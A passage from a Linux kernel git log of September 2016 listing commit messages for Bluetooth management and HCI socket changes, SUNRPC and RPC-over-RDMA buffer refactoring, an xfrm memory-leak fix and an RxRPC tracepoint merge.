with the proper error value between 0xd-0xf. The code uses
HCI_ERROR_REMOTE_LOW_RESOURCES which is 0x14.

This led to following error:
< HCI Command: Reject Synchronous Co.. (0x01|0x002a) plen 7
        Address: 34:51:C9:EF:02:CA (Apple, Inc.)
        Reason: Remote Device Terminated due to Low Resources (0x14)
> HCI Event: Command Status (0x0f) plen 4
      Reject Synchronous Connection Request (0x01|0x002a) ncmd 1
        Status: Invalid HCI Command Parameters (0x12)

Instead make use of HCI_ERROR_REJ_LIMITED_RESOURCES which is 0xd.

Signed-off-by: Frédéric Dalleau <frederic.dalleau@collabora.co.uk>
Signed-off-by: Marcel Holtmann <marcel@holtmann.org>
2016-09-19 20:19:34 +02:00
Marcel Holtmann
baab793225 Bluetooth: Fix wrong New Settings event when closing HCI User Channel
When closing HCI User Channel, the New Settings event was send out to
inform about changed settings. However such event is wrong since the
exclusive HCI User Channel access is active until the Index Added event
has been sent.

@ USER Close: test
@ MGMT Event: New Settings (0x0006) plen 4
        Current settings: 0x00000ad0
          Bondable
          Secure Simple Pairing
          BR/EDR
          Low Energy
          Secure Connections
= Close Index: 00:14:EF:22:04:12
@ MGMT Event: Index Added (0x0004) plen 0

Calling __mgmt_power_off from hci_dev_do_close requires an extra check
for an active HCI User Channel.

Signed-off-by: Marcel Holtmann <marcel@holtmann.org>
Signed-off-by: Johan Hedberg <johan.hedberg@intel.com>
2016-09-19 20:19:34 +02:00
Marcel Holtmann
aa1638dde7 Bluetooth: Send control open and close messages for HCI user channels
When opening and closing HCI user channel, send monitoring messages to
be able to trace its behavior.

Signed-off-by: Marcel Holtmann <marcel@holtmann.org>
Signed-off-by: Johan Hedberg <johan.hedberg@intel.com>
2016-09-19 20:19:34 +02:00
Michał Narajowski
8a0c9f4909 Bluetooth: Append local name and CoD to Extended Controller Info
This adds device class, complete local name and short local name
to EIR data in Extended Controller Info as specified in docs.

Signed-off-by: Michał Narajowski <michal.narajowski@codecoup.pl>
Signed-off-by: Marcel Holtmann <marcel@holtmann.org>
2016-09-19 20:19:34 +02:00
Marcel Holtmann
321c6feed2 Bluetooth: Add framework for Extended Controller Information
This command is used to retrieve the current state and basic
information of a controller. It is typically used right after
getting the response to the Read Controller Index List command
or an Index Added event (or its extended counterparts).

When any of the values in the EIR_Data field changes, the event
Extended Controller Information Changed will be used to inform
clients about the updated information.

Signed-off-by: Marcel Holtmann <marcel@holtmann.org>
Signed-off-by: Michał Narajowski <michal.narajowski@codecoup.pl>
2016-09-19 20:19:34 +02:00
Marcel Holtmann
f4cdbb3f25 Bluetooth: Handle HCI raw socket transition from unbound to bound
In case an unbound HCI raw socket is later on bound, ensure that the
monitor notification messages indicate a close and re-open. None of
the userspace tools use the socket this, but it is actually possible
to use an ioctl on an unbound socket and then later bind it.

Signed-off-by: Marcel Holtmann <marcel@holtmann.org>
Signed-off-by: Johan Hedberg <johan.hedberg@intel.com>
2016-09-19 20:19:34 +02:00
Marcel Holtmann
f81f5b2db8 Bluetooth: Send control open and close messages for HCI raw sockets
When opening and closing HCI raw sockets their main usage is for legacy
userspace. To track interaction with the modern mgmt interface, send
open and close monitoring messages for these action.

The HCI raw sockets is special since it supports unbound ioctl operation
and for that special case delay the notification message until at least
one ioctl has been executed. The difference between a bound and unbound
socket will be detailed by the fact the HCI index is present or not.

Signed-off-by: Marcel Holtmann <marcel@holtmann.org>
Signed-off-by: Johan Hedberg <johan.hedberg@intel.com>
2016-09-19 20:19:34 +02:00
Marcel Holtmann
d0bef1d26f Bluetooth: Add extra channel checks for control open/close messages
The control open and close monitoring events require special channel
checks to ensure messages are only send when the right events happen.

Signed-off-by: Marcel Holtmann <marcel@holtmann.org>
Signed-off-by: Johan Hedberg <johan.hedberg@intel.com>
2016-09-19 20:19:34 +02:00
Marcel Holtmann
5a6d2cf5f1 Bluetooth: Assign the channel early when binding HCI sockets
Assignment of the hci_pi(sk)->channel should be done early when binding
the HCI socket. This avoids confusion with the RAW channel that is used
for legacy access.

Signed-off-by: Marcel Holtmann <marcel@holtmann.org>
Signed-off-by: Johan Hedberg <johan.hedberg@intel.com>
2016-09-19 20:19:34 +02:00
Marcel Holtmann
0ef2c42f8c Bluetooth: Send control open and close only when cookie is present
Only when the cookie has been assigned, then send the open and close
monitor messages. Also if the socket is bound to a device, then include
the index into the message.

Signed-off-by: Marcel Holtmann <marcel@holtmann.org>
Signed-off-by: Johan Hedberg <johan.hedberg@intel.com>
2016-09-19 20:19:34 +02:00
Marcel Holtmann
9e8305b39b Bluetooth: Use numbers for subsystem version string
Instead of keeping a version string around, use version and revision
numbers and then stringify them for use as module parameter.

Signed-off-by: Marcel Holtmann <marcel@holtmann.org>
Signed-off-by: Johan Hedberg <johan.hedberg@intel.com>
2016-09-19 20:19:34 +02:00
Marcel Holtmann
df1cb87af9 Bluetooth: Introduce helper functions for socket cookie handling
Instead of manually allocating cookie information each time, use helper
functions for generating and releasing cookies.

Signed-off-by: Marcel Holtmann <marcel@holtmann.org>
Signed-off-by: Johan Hedberg <johan.hedberg@intel.com>
2016-09-19 20:19:34 +02:00
Marcel Holtmann
9db5c62951 Bluetooth: Use command status event for Set IO Capability errors
In case of failure, the Set IO Capability command is suppose to return
command status and not command complete.

Signed-off-by: Marcel Holtmann <marcel@holtmann.org>
Signed-off-by: Johan Hedberg <johan.hedberg@intel.com>
2016-09-19 20:19:34 +02:00
Marcel Holtmann
56f787c502 Bluetooth: Fix wrong Get Clock Information return parameters
The address information of the Get Clock Information return parameters
is copying from a different memory location. It uses &cmd->param while
it actually needs to be cmd->param.

Signed-off-by: Marcel Holtmann <marcel@holtmann.org>
Signed-off-by: Johan Hedberg <johan.hedberg@intel.com>
2016-09-19 20:19:34 +02:00
Marcel Holtmann
5504c3a310 Bluetooth: Use individual flags for certain management events
Instead of hiding everything behind a general managment events flag,
introduce indivdual flags that allow fine control over which events are
send to a given management channel.

Signed-off-by: Marcel Holtmann <marcel@holtmann.org>
Signed-off-by: Johan Hedberg <johan.hedberg@intel.com>
2016-09-19 20:19:34 +02:00
Johan Hedberg
37d3a1fab5 Bluetooth: mgmt: Fix sending redundant event for Advertising Instance
When an Advertising Instance is removed, the Advertising Removed event
shouldn't be sent to the same socket that issued the Remove
Advertising command (it gets a command complete event instead). The
mgmt_advertising_removed() function already has a parameter for
skipping a specific socket, but there was no code to propagate the
right value to this parameter. This patch fixes the issue by making
sure the intermediate hci_req_clear_adv_instance() function gets the
socket pointer.

Signed-off-by: Johan Hedberg <johan.hedberg@intel.com>
Signed-off-by: Marcel Holtmann <marcel@holtmann.org>
2016-09-19 20:19:34 +02:00
Marcel Holtmann
38ceaa00d0 Bluetooth: Add support for sending MGMT commands and events to monitor
This adds support for tracing all management commands and events via the
monitor interface.

Signed-off-by: Marcel Holtmann <marcel@holtmann.org>
Signed-off-by: Johan Hedberg <johan.hedberg@intel.com>
2016-09-19 20:19:34 +02:00
Marcel Holtmann
249fa1699f Bluetooth: Add support for sending MGMT open and close to monitor
This sends new notifications to the monitor support whenever a
management channel has been opened or closed. This allows tracing of
control channels really easily.

Signed-off-by: Marcel Holtmann <marcel@holtmann.org>
Signed-off-by: Johan Hedberg <johan.hedberg@intel.com>
2016-09-19 20:19:34 +02:00
Marcel Holtmann
03c979c471 Bluetooth: Introduce helper to pack mgmt version information
The mgmt version information will be also needed for the control
changell tracing feature. This provides a helper to pack them.

Signed-off-by: Marcel Holtmann <marcel@holtmann.org>
Signed-off-by: Johan Hedberg <johan.hedberg@intel.com>
2016-09-19 20:19:34 +02:00
Marcel Holtmann
70ecce91e3 Bluetooth: Store control socket cookie and comm information
To further allow unique identification and tracking of control socket,
store cookie and comm information when binding the socket.

Signed-off-by: Marcel Holtmann <marcel@holtmann.org>
Signed-off-by: Johan Hedberg <johan.hedberg@intel.com>
2016-09-19 20:19:34 +02:00
Marcel Holtmann
47b0f573f2 Bluetooth: Check SOL_HCI for raw socket options
The SOL_HCI level should be enforced when using socket options on the
HCI raw socket interface.

Signed-off-by: Marcel Holtmann <marcel@holtmann.org>
Signed-off-by: Johan Hedberg <johan.hedberg@intel.com>
2016-09-19 20:19:34 +02:00
Aristeu Rozanski
bd89bb6daa mac802154: use rate limited warnings for malformed frames
Signed-off-by: Aristeu Rozanski <arozansk@redhat.com>
Acked-by: Alexander Aring <aar@pengutronix.de>
Signed-off-by: Marcel Holtmann <marcel@holtmann.org>
2016-09-19 20:19:34 +02:00
Aristeu Rozanski
ca1de81aa2 mac802154: don't warn on unsupported frames
Just because we don't support certain types of frames yet doesn't mean
we have to flood the message log with warnings about "invalid" frames.

Signed-off-by: Aristeu Rozanski <arozansk@redhat.com>
Acked-by: Alexander Aring <aar@pengutronix.de>
Signed-off-by: Marcel Holtmann <marcel@holtmann.org>
2016-09-19 20:19:34 +02:00
Alexander Aring
5ddedce3b7 6lowpan: ndisc: no overreact if no short address is available
This patch removes handling to remove short address for a neigbour entry
if RS/RA/NS/NA doesn't contain a short address. If these messages
doesn't has any short address option, the existing short address from
ndisc cache will be used. The current behaviour will set that the
neigbour doesn't has a short address anymore.

Signed-off-by: Alexander Aring <aar@pengutronix.de>
Signed-off-by: Marcel Holtmann <marcel@holtmann.org>
2016-09-19 20:19:34 +02:00
Alexander Aring
abbcc341ad mac802154: set phy net namespace for new ifaces
This patch sets the net namespace when creating SoftMAC interfaces. This
is important if the namespace at phy layer was switched before.
Currently we losing interfaces in some namespace and it's not possible
to recover that.

Signed-off-by: Alexander Aring <aar@pengutronix.de>
Signed-off-by: Marcel Holtmann <marcel@holtmann.org>
2016-09-19 20:19:34 +02:00
Marcel Holtmann
e64c97b53b Bluetooth: Add combined LED trigger for controller power
Instead of just having a LED trigger for power on a specific controller,
this adds the LED trigger "bluetooth-power" that combines the power
states of all controllers into a single trigger. This simplifies the
trigger selection and also supports multiple controllers per host
system via a single LED.

Signed-off-by: Marcel Holtmann <marcel@holtmann.org>
Signed-off-by: Johan Hedberg <johan.hedberg@intel.com>
2016-09-19 20:19:34 +02:00
David Vrabel
d48f9ce73c sunrpc: fix write space race causing stalls
Write space becoming available may race with putting the task to sleep
in xprt_wait_for_buffer_space().  The existing mechanism to avoid the
race does not work.

This (edited) partial trace illustrates the problem:

   [1] rpc_task_run_action: task:43546@5 ... action=call_transmit
   [2] xs_write_space <-xs_tcp_write_space
   [3] xprt_write_space <-xs_write_space
   [4] rpc_task_sleep: task:43546@5 ...
   [5] xs_write_space <-xs_tcp_write_space

[1] Task 43546 runs but is out of write space.

[2] Space becomes available, xs_write_space() clears the
    SOCKWQ_ASYNC_NOSPACE bit.

[3] xprt_write_space() attemts to wake xprt->snd_task (== 43546), but
    this has not yet been queued and the wake up is lost.

[4] xs_nospace() is called which calls xprt_wait_for_buffer_space()
    which queues task 43546.

[5] The call to sk->sk_write_space() at the end of xs_nospace() (which
    is supposed to handle the above race) does not call
    xprt_write_space() as the SOCKWQ_ASYNC_NOSPACE bit is clear and
    thus the task is not woken.

Fix the race by resetting the SOCKWQ_ASYNC_NOSPACE bit in xs_nospace()
so the second call to sk->sk_write_space() calls xprt_write_space().

Suggested-by: Trond Myklebust <trondmy@primarydata.com>
Signed-off-by: David Vrabel <david.vrabel@citrix.com>
cc: stable@vger.kernel.org # 4.4
Signed-off-by: Anna Schumaker <Anna.Schumaker@Netapp.com>
2016-09-19 13:21:36 -04:00
Chuck Lever
496b77a5c5 xprtrdma: Eliminate rpcrdma_receive_worker()
Clean up: the extra layer of indirection doesn't add value.

Signed-off-by: Chuck Lever <chuck.lever@oracle.com>
Signed-off-by: Anna Schumaker <Anna.Schumaker@Netapp.com>
2016-09-19 13:08:38 -04:00
Chuck Lever
1519e9697d xprtrdma: Rename rpcrdma_receive_wc()
Clean up: When converting xprtrdma to use the new CQ API, I missed a
spot. The naming convention elsewhere is:

  {svc_rdma,rpcrdma}_wc_{operation}

Signed-off-by: Chuck Lever <chuck.lever@oracle.com>
Signed-off-by: Anna Schumaker <Anna.Schumaker@Netapp.com>
2016-09-19 13:08:38 -04:00
Chuck Lever
eeb30613e1 xprtrmda: Report address of frmr, not mw
Tie frwr debugging messages together by always reporting the address
of the frwr.

Signed-off-by: Chuck Lever <chuck.lever@oracle.com>
Signed-off-by: Anna Schumaker <Anna.Schumaker@Netapp.com>
2016-09-19 13:08:38 -04:00
Chuck Lever
44829d02d2 xprtrdma: Support larger inline thresholds
The Version One default inline threshold is still 1KB. But allow
testing with thresholds up to 64KB.

This maximum is somewhat arbitrary. There's no fundamental
architectural limit I'm aware of, but it's good to keep the size of
Receive buffers reasonable. Now that Send can use a s/g list, a
Send buffer is only as large as each RPC requires. Receive buffers
are always the size of the inline threshold, however.

Signed-off-by: Chuck Lever <chuck.lever@oracle.com>
Signed-off-by: Anna Schumaker <Anna.Schumaker@Netapp.com>
2016-09-19 13:08:38 -04:00
Chuck Lever
655fec6987 xprtrdma: Use gathered Send for large inline messages
An RPC Call message that is sent inline but that has a data payload
(ie, one or more items in rq_snd_buf's page list) must be "pulled
up:"

- call_allocate has to reserve enough RPC Call buffer space to
accommodate the data payload

- call_transmit has to memcopy the rq_snd_buf's page list and tail
into its head iovec before it is sent

As the inline threshold is increased beyond its current 1KB default,
however, this means data payloads of more than a few KB are copied
by the host CPU. For example, if the inline threshold is increased
just to 4KB, then NFS WRITE requests up to 4KB would involve a
memcpy of the NFS WRITE's payload data into the RPC Call buffer.
This is an undesirable amount of participation by the host CPU.

The inline threshold may be much larger than 4KB in the future,
after negotiation with a peer server.

Instead of copying the components of rq_snd_buf into its head iovec,
construct a gather list of these components, and send them all in
place. The same approach is already used in the Linux server's
RPC-over-RDMA reply path.

This mechanism also eliminates the need for rpcrdma_tail_pullup,
which is used to manage the XDR pad and trailing inline content when
a Read list is present.

This requires that the pages in rq_snd_buf's page list be DMA-mapped
during marshaling, and unmapped when a data-bearing RPC is
completed. This is slightly less efficient for very small I/O
payloads, but significantly more efficient as data payload size and
inline threshold increase past a kilobyte.

Signed-off-by: Chuck Lever <chuck.lever@oracle.com>
Signed-off-by: Anna Schumaker <Anna.Schumaker@Netapp.com>
2016-09-19 13:08:38 -04:00
Chuck Lever
c8b920bb49 xprtrdma: Basic support for Remote Invalidation
Have frwr's ro_unmap_sync recognize an invalidated rkey that appears
as part of a Receive completion. Local invalidation can be skipped
for that rkey.

Use an out-of-band signaling mechanism to indicate to the server
that the client is prepared to receive RDMA Send With Invalidate.

Signed-off-by: Chuck Lever <chuck.lever@oracle.com>
Signed-off-by: Anna Schumaker <Anna.Schumaker@Netapp.com>
2016-09-19 13:08:38 -04:00
Chuck Lever
87cfb9a0c8 xprtrdma: Client-side support for rpcrdma_connect_private
Send an RDMA-CM private message on connect, and look for one during
a connection-established event.

Both sides can communicate their various implementation limits.
Implementations that don't support this sideband protocol ignore it.

Once the client knows the server's inline threshold maxima, it can
adjust the use of Reply chunks, and eliminate most use of Position
Zero Read chunks. Moderately-sized I/O can be done using a pure
inline RDMA Send instead of RDMA operations that require memory
registration.

Signed-off-by: Chuck Lever <chuck.lever@oracle.com>
Signed-off-by: Anna Schumaker <Anna.Schumaker@Netapp.com>
2016-09-19 13:08:38 -04:00
Chuck Lever
6ea8e71150 xprtrdma: Move recv_wr to struct rpcrdma_rep
Clean up: The fields in the recv_wr do not vary. There is no need to
initialize them before each ib_post_recv(). This removes a large-ish
data structure from the stack.

Signed-off-by: Chuck Lever <chuck.lever@oracle.com>
Signed-off-by: Anna Schumaker <Anna.Schumaker@Netapp.com>
2016-09-19 13:08:38 -04:00
Chuck Lever
90aab60296 xprtrdma: Move send_wr to struct rpcrdma_req
Clean up: Most of the fields in each send_wr do not vary. There is
no need to initialize them before each ib_post_send(). This removes
a large-ish data structure from the stack.

Signed-off-by: Chuck Lever <chuck.lever@oracle.com>
Signed-off-by: Anna Schumaker <Anna.Schumaker@Netapp.com>
2016-09-19 13:08:38 -04:00
Chuck Lever
b157380af1 xprtrdma: Simplify rpcrdma_ep_post_recv()
Clean up.

Since commit fc66448549 ("xprtrdma: Split the completion queue"),
rpcrdma_ep_post_recv() no longer uses the "ep" argument.

Signed-off-by: Chuck Lever <chuck.lever@oracle.com>
Signed-off-by: Anna Schumaker <Anna.Schumaker@Netapp.com>
2016-09-19 13:08:38 -04:00
Chuck Lever
13650c23f1 xprtrdma: Eliminate "ia" argument in rpcrdma_{alloc, free}_regbuf
Clean up. The "ia" argument is no longer used.

Signed-off-by: Chuck Lever <chuck.lever@oracle.com>
Signed-off-by: Anna Schumaker <Anna.Schumaker@Netapp.com>
2016-09-19 13:08:38 -04:00
Chuck Lever
54cbd6b0c6 xprtrdma: Delay DMA mapping Send and Receive buffers
Currently, each regbuf is allocated and DMA mapped at the same time.
This is done during transport creation.

When a device driver is unloaded, every DMA-mapped buffer in use by
a transport has to be unmapped, and then remapped to the new
device if the driver is loaded again. Remapping will have to be done
_after_ the connect worker has set up the new device.

But there's an ordering problem:

call_allocate, which invokes xprt_rdma_allocate which calls
rpcrdma_alloc_regbuf to allocate Send buffers, happens _before_
the connect worker can run to set up the new device.

Instead, at transport creation, allocate each buffer, but leave it
unmapped. Once the RPC carries these buffers into ->send_request, by
which time a transport connection should have been established,
check to see that the RPC's buffers have been DMA mapped. If not,
map them there.

When device driver unplug support is added, it will simply unmap all
the transport's regbufs, but it doesn't have to deallocate the
underlying memory.

Signed-off-by: Chuck Lever <chuck.lever@oracle.com>
Signed-off-by: Anna Schumaker <Anna.Schumaker@Netapp.com>
2016-09-19 13:08:37 -04:00
Chuck Lever
99ef4db329 xprtrdma: Replace DMA_BIDIRECTIONAL
The use of DMA_BIDIRECTIONAL is discouraged by DMA-API.txt.
Fortunately, xprtrdma now knows which direction I/O is going as
soon as it allocates each regbuf.

The RPC Call and Reply buffers are no longer the same regbuf. They
can each be labeled correctly now. The RPC Reply buffer is never
part of either a Send or Receive WR, but it can be part of Reply
chunk, which is mapped and registered via ->ro_map . So it is not
DMA mapped when it is allocated (DMA_NONE), to avoid a double-
mapping.

Since Receive buffers are no longer DMA_BIDIRECTIONAL and their
contents are never modified by the host CPU, DMA-API-HOWTO.txt
suggests that a DMA sync before posting each buffer should be
unnecessary. (See my_card_interrupt_handler).

Signed-off-by: Chuck Lever <chuck.lever@oracle.com>
Signed-off-by: Anna Schumaker <Anna.Schumaker@Netapp.com>
2016-09-19 13:08:37 -04:00
Chuck Lever
08cf2efd54 xprtrdma: Use smaller buffers for RPC-over-RDMA headers
Commit 949317464b ("xprtrdma: Limit number of RDMA segments in
RPC-over-RDMA headers") capped the number of chunks that may appear
in RPC-over-RDMA headers. The maximum header size can be estimated
and fixed to avoid allocating buffer space that is never used.

Signed-off-by: Chuck Lever <chuck.lever@oracle.com>
Signed-off-by: Anna Schumaker <Anna.Schumaker@Netapp.com>
2016-09-19 13:08:37 -04:00
Chuck Lever
9c40c49f14 xprtrdma: Initialize separate RPC call and reply buffers
RPC-over-RDMA needs to separate its RPC call and reply buffers.

 o When an RPC Call is sent, rq_snd_buf is DMA mapped for an RDMA
   Send operation using DMA_TO_DEVICE

 o If the client expects a large RPC reply, it DMA maps rq_rcv_buf
   as part of a Reply chunk using DMA_FROM_DEVICE

The two mappings are for data movement in opposite directions.

DMA-API.txt suggests that if these mappings share a DMA cacheline,
bad things can happen. This could occur in the final bytes of
rq_snd_buf and the first bytes of rq_rcv_buf if the two buffers
happen to share a DMA cacheline.

On x86_64 the cacheline size is typically 8 bytes, and RPC call
messages are usually much smaller than the send buffer, so this
hasn't been a noticeable problem. But the DMA cacheline size can be
larger on other platforms.

Also, often rq_rcv_buf starts most of the way into a page, thus
an additional RDMA segment is needed to map and register the end of
that buffer. Try to avoid that scenario to reduce the cost of
registering and invalidating Reply chunks.

Instead of carrying a single regbuf that covers both rq_snd_buf and
rq_rcv_buf, each struct rpcrdma_req now carries one regbuf for
rq_snd_buf and one regbuf for rq_rcv_buf.

Some incidental changes worth noting:

- To clear out some spaghetti, refactor xprt_rdma_allocate.
- The value stored in rg_size is the same as the value stored in
  the iov.length field, so eliminate rg_size

Signed-off-by: Chuck Lever <chuck.lever@oracle.com>
Signed-off-by: Anna Schumaker <Anna.Schumaker@Netapp.com>
2016-09-19 13:08:37 -04:00
Chuck Lever
5a6d1db455 SUNRPC: Add a transport-specific private field in rpc_rqst
Currently there's a hidden and indirect mechanism for finding the
rpcrdma_req that goes with an rpc_rqst. It depends on getting from
the rq_buffer pointer in struct rpc_rqst to the struct
rpcrdma_regbuf that controls that buffer, and then to the struct
rpcrdma_req it goes with.

This was done back in the day to avoid the need to add a per-rqst
pointer or to alter the buf_free API when support for RPC-over-RDMA
was introduced.

I'm about to change the way regbuf's work to support larger inline
thresholds. Now is a good time to replace this indirect mechanism
with something that is more straightforward. I guess this should be
considered a clean up.

Signed-off-by: Chuck Lever <chuck.lever@oracle.com>
Signed-off-by: Anna Schumaker <Anna.Schumaker@Netapp.com>
2016-09-19 13:08:37 -04:00
Chuck Lever
68778945e4 SUNRPC: Separate buffer pointers for RPC Call and Reply messages
For xprtrdma, the RPC Call and Reply buffers are involved in real
I/O operations.

To start with, the DMA direction of the I/O for a Call is opposite
that of a Reply.

In the current arrangement, the Reply buffer address is on a
four-byte alignment just past the call buffer. Would be friendlier
on some platforms if that was at a DMA cache alignment instead.

Because the current arrangement allocates a single memory region
which contains both buffers, the RPC Reply buffer often contains a
page boundary in it when the Call buffer is large enough (which is
frequent).

It would be a little nicer for setting up DMA operations (and
possible registration of the Reply buffer) if the two buffers were
separated, well-aligned, and contained as few page boundaries as
possible.

Now, I could just pad out the single memory region used for the pair
of buffers. But frequently that would mean a lot of unused space to
ensure the Reply buffer did not have a page boundary.

Add a separate pointer to rpc_rqst that points right to the RPC
Reply buffer. This makes no difference to xprtsock, but it will help
xprtrdma in subsequent patches.

Signed-off-by: Chuck Lever <chuck.lever@oracle.com>
Signed-off-by: Anna Schumaker <Anna.Schumaker@Netapp.com>
2016-09-19 13:08:37 -04:00
Chuck Lever
3435c74aed SUNRPC: Generalize the RPC buffer release API
xprtrdma needs to allocate the Call and Reply buffers separately.
TBH, the reliance on using a single buffer for the pair of XDR
buffers is transport implementation-specific.

Instead of passing just the rq_buffer into the buf_free method, pass
the task structure and let buf_free take care of freeing both
XDR buffers at once.

There's a micro-optimization here. In the common case, both
xprt_release and the transport's buf_free method were checking if
rq_buffer was NULL. Now the check is done only once per RPC.

Signed-off-by: Chuck Lever <chuck.lever@oracle.com>
Signed-off-by: Anna Schumaker <Anna.Schumaker@Netapp.com>
2016-09-19 13:08:37 -04:00
Chuck Lever
5fe6eaa1f9 SUNRPC: Generalize the RPC buffer allocation API
xprtrdma needs to allocate the Call and Reply buffers separately.
TBH, the reliance on using a single buffer for the pair of XDR
buffers is transport implementation-specific.

Transports that want to allocate separate Call and Reply buffers
will ignore the "size" argument anyway.  Don't bother passing it.

The buf_alloc method can't return two pointers. Instead, make the
method's return value an error code, and set the rq_buffer pointer
in the method itself.

This gives call_allocate an opportunity to terminate an RPC instead
of looping forever when a permanent problem occurs. If a request is
just bogus, or the transport is in a state where it can't allocate
resources for any request, there needs to be a way to kill the RPC
right there and not loop.

This immediately fixes a rare problem in the backchannel send path,
which loops if the server happens to send a CB request whose
call+reply size is larger than a page (which it shouldn't do yet).

One more issue: looks like xprt_inject_disconnect was incorrectly
placed in the failure path in call_allocate. It needs to be in the
success path, as it is for other call-sites.

Signed-off-by: Chuck Lever <chuck.lever@oracle.com>
Signed-off-by: Anna Schumaker <Anna.Schumaker@Netapp.com>
2016-09-19 13:08:37 -04:00
Chuck Lever
b9c5bc03be SUNRPC: Refactor rpc_xdr_buf_init()
Clean up: there is some XDR initialization logic that is common
to the forward channel and backchannel. Move it to an XDR header
so it can be shared.

rpc_rqst::rq_buffer points to a buffer containing big-endian data.
Update its annotation as part of the clean up.

Signed-off-by: Chuck Lever <chuck.lever@oracle.com>
Signed-off-by: Anna Schumaker <Anna.Schumaker@Netapp.com>
2016-09-19 13:08:37 -04:00
Chuck Lever
eb342e9a38 xprtrdma: Eliminate INLINE_THRESHOLD macros
Clean up: r_xprt is already available everywhere these macros are
invoked, so just dereference that directly.

RPCRDMA_INLINE_PAD_VALUE is no longer used, so it can simply be
removed.

Signed-off-by: Chuck Lever <chuck.lever@oracle.com>
Signed-off-by: Anna Schumaker <Anna.Schumaker@Netapp.com>
2016-09-19 13:08:37 -04:00
Andy Adamson
fda0ab4117 SUNRPC: rpc_clnt_add_xprt setup function for NFS layer
Use a setup function to call into the NFS layer to test an rpc_xprt
for session trunking so as to not leak the rpc_xprt_switch into
the nfs layer.

Search for the address in the rpc_xprt_switch first so as not to
put an unnecessary EXCHANGE_ID on the wire.

Signed-off-by: Andy Adamson <andros@netapp.com>
Signed-off-by: Anna Schumaker <Anna.Schumaker@Netapp.com>
2016-09-19 13:08:36 -04:00
Andy Adamson
39e5d2df95 SUNRPC search xprt switch for sockaddr
Signed-off-by: Andy Adamson <andros@netapp.com>
Signed-off-by: Anna Schumaker <Anna.Schumaker@Netapp.com>
2016-09-19 13:08:36 -04:00
Andy Adamson
dd69171769 SUNRPC rpc_clnt_xprt_switch_add_xprt
Give the NFS layer access to the rpc_xprt_switch_add_xprt function

Signed-off-by: Andy Adamson <andros@netapp.com>
Signed-off-by: Anna Schumaker <Anna.Schumaker@Netapp.com>
2016-09-19 13:08:36 -04:00
Andy Adamson
3b58a8a904 SUNRPC rpc_clnt_xprt_switch_put
Give the NFS layer access to the xprt_switch_put function

Signed-off-by: Andy Adamson <andros@netapp.com>
Signed-off-by: Anna Schumaker <Anna.Schumaker@Netapp.com>
2016-09-19 13:08:36 -04:00
Andy Adamson
7705f6abbb SUNRPC remove rpc_task_release_client from rpc_task_set_client
rpc_task_set_client is only called from rpc_run_task after
rpc_new_task and rpc_task_release_client is not needed as the
task is new.

When called from rpc_new_task, rpc_task_set_client also removed the
assigned rpc_xprt which is not desired.

Signed-off-by: Andy Adamson <andros@netapp.com>
Signed-off-by: Anna Schumaker <Anna.Schumaker@Netapp.com>
2016-09-19 13:08:36 -04:00
Trond Myklebust
d002526886 SUNRPC: Initialise struct svc_serv backchannel fields during __svc_create()
Clean up.

Signed-off-by: Trond Myklebust <trond.myklebust@primarydata.com>
Signed-off-by: Anna Schumaker <Anna.Schumaker@Netapp.com>
2016-09-19 13:08:36 -04:00
Amitoj Kaur Chawla
2813b626e3 sunrpc: Remove unnecessary variable
The variable `err` is not used anywhere and just returns the
predefined value `0` at the end of the function. Hence, remove the
variable and return 0 explicitly.

Signed-off-by: Amitoj Kaur Chawla <amitoj1606@gmail.com>
Signed-off-by: Anna Schumaker <Anna.Schumaker@Netapp.com>
2016-09-19 13:08:35 -04:00
Ilan Tayari
b588479358 xfrm: Fix memory leak of aead algorithm name
commit 1a6509d991 ("[IPSEC]: Add support for combined mode algorithms")
introduced aead. The function attach_aead kmemdup()s the algorithm
name during xfrm_state_construct().
However this memory is never freed.
Implementation has since been slightly modified in
commit ee5c23176f ("xfrm: Clone states properly on migration")
without resolving this leak.
This patch adds a kfree() call for the aead algorithm name.

Fixes: 1a6509d991 ("[IPSEC]: Add support for combined mode algorithms")
Signed-off-by: Ilan Tayari <ilant@mellanox.com>
Acked-by: Rami Rosen <roszenrami@gmail.com>
Signed-off-by: Steffen Klassert <steffen.klassert@secunet.com>
2016-09-19 12:08:58 +02:00
David S. Miller
e867e87ae8 RxRPC rewrite
-----BEGIN PGP SIGNATURE-----
 
 iQIVAwUAV90ZzvSw1s6N8H32AQIBsg//StI2J/tyGGTvvVXoeWPAGeDZp8907Qbc
 O6671V3feft0HvenQ/uFfC9PdpRTYHTlQhWidk9/wTx5nvg/5b7HGHSD8ghPnCRj
 Jyu4XbpXM6vw650qSBpRAg5TLIAkSsrdjaANzFSYw70sX6eTLdKJF3YFyoDRD2Cc
 T2Y0XIUAcACl5/A/KIHRaKjTtmzhoc5Vih9lOWQRZ/dw2u0A6GdwN0qoFfHqXwvI
 t1S4MtSkXrO8D9uWqmFhTpRzSAzO57L7bccVJbr+OzdNAm/Bkicjrxyzo6YepDAg
 VRdYaNtKCR9vPRFb9vZFlZy3vyUHb/22mrgM6/V5GG5qd/NFSnouFZ/WGxLnv1Yt
 5X+F0qJXXgxSmaGt0f6cV7d9OO24HU/YWGl7wUCHsMZ4bWDySBUWtk0X4USpCsiD
 +AUxYJTEUNKZcCsW8XmC+cfnkRLNPycX603/pCH7aiPdQ5qY+ue89ICxu3PrJrf/
 S8PuQPIoEWmEdTQ9QweG9FpIuQc2LO9fmzOJdiZXHYbGAKFOfNNz5Z64tSVRvPVE
 WbxW0HYSNCJmBt15OI3hyONmbgACgmuD+e3EFWzCATz94FwMogLBFNqPcw1YpbwX
 48RdcP62gx7FMZ4MdqfWllviZKjTlTVmacCRghwGFBOuZL3ifu1gfhsTbrAxqXCs
 CSlnXgZV7gI=
 =/2cJ
 -----END PGP SIGNATURE-----

Merge tag 'rxrpc-rewrite-20160917-2' of git://git.kernel.org/pub/scm/linux/kernel/git/dhowells/linux-fs

David Howells says:

====================
rxrpc: Tracepoint addition and improvement

Here is a set of patches that add some more tracepoints and improve a couple
of existing ones.  New additions include:

 (1) Connection refcount tracking.

 (2) Client connection state machine tracking.

 (3) Tx and Rx packet lifecycle.

 (4) ACK reception and transmission.

 (5) recvmsg processing.

Updates include:

 (1) Print the symbolic packet name in the Rx packet tracepoint.

 (2) Additional call refcount trace events.

 (3) Improvements to sk_buff tracking with AF_RXRPC.

In addition:

 (1) Config option to inject packet loss during both transmission and
     reception.

 (2) Removal of some printks.

This series needs to be applied on top of the previously posted fixes.
====================

Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-19 01:52:21 -04:00
David S. Miller
5b0c6fc8ef RxRPC rewrite
-----BEGIN PGP SIGNATURE-----
 
